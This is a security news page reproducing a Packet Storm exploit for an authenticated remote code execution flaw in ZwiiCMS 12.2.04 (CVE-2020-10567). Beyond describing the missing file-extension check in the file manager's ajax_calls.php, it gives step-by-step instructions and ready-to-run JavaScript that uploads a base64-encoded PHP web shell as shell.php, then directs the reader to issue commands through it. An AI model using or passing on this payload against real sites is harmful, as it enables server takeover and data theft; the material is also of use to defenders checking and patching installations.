Security
Headlines
HeadlinesLatestCVEs

Headline

ZwiiCMS 12.2.04 Remote Code Execution

ZwiiCMS version 12.2.04 suffers from an authenticated remote code execution vulnerability.

Packet Storm
#vulnerability#web#git#java#php#rce#auth
# Exploit Title: ZwiiCMS 12.2.04 Remote Code Execution (Authenticated) # Date: 03/06/2023# Exploit Author: Hadi Mene# Vendor Homepage: https://zwiicms.fr/# Version: 12.2.04 and potentially lower versions # CVE: CVE-2020-10567# Category: webappsZwiiCMS 12.2.04 uses "Responible FileManager" 9.14.0 for its file manager feature. ZwiiCMS is vulnerable to CVE-2020-10567 as it is possible foran authenticated user to use ajax_calls.php to upload a php file via a base64 encoded file and gain Remote Code Execution due to a lack of extension check on the uploaded file.Original CVE author : hackoclipsehttps://github.com/trippo/ResponsiveFilemanager/issues/600Vulnerable code (ajax_calls.php) :// there is no extension check on $_POST['name'] and the content of $_POST['url'] can be b64 decoded without beingnecessarily an image81  case 'save_img':82      $info = pathinfo($_POST['name']);83  $image_data = $_POST['url'];8485  if (preg_match('/^data:image\/(\w+);base64,/', $image_data, $type)) {86       $image_data = substr($image_data, strpos($image_data, ',') + 1);87       $type = strtolower($type[1]); // jpg, png, gif8889       $image_data = base64_decode($image_data);PoC:1) Login in the Administration Panel. 2) Click on the Folder icon on the top of the panel.3) Open the Developer Tools for that page.4) Copy,Edit and Execute the Javascript Code below .5) Access your PHP shell at http://ZWIICMS_URL/site/file/source/shell.php?cmd=COMMANDJavascript Code######  function submitRequest()      {        var xhr = new XMLHttpRequest();        xhr.open("POST", "https:\/\/192.168.0.27\/zwiicms\/core\/vendor\/filemanager\/ajax_calls.php?action=save_img", true);        xhr.setRequestHeader("Accept", "*\/*");        xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");        xhr.withCredentials = true;        var body = "url=data:image/jpeg;base64,PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pg==&path=&name=shell.php";        var aBody = new Uint8Array(body.length);        for (var i = 0; i < aBody.length; i++)          aBody[i] = body.charCodeAt(i);         xhr.send(new Blob([aBody]));      }submitRequest();######

Packet Storm: Latest News

ABB Cylon Aspect 3.07.02 user.properties Default Credentials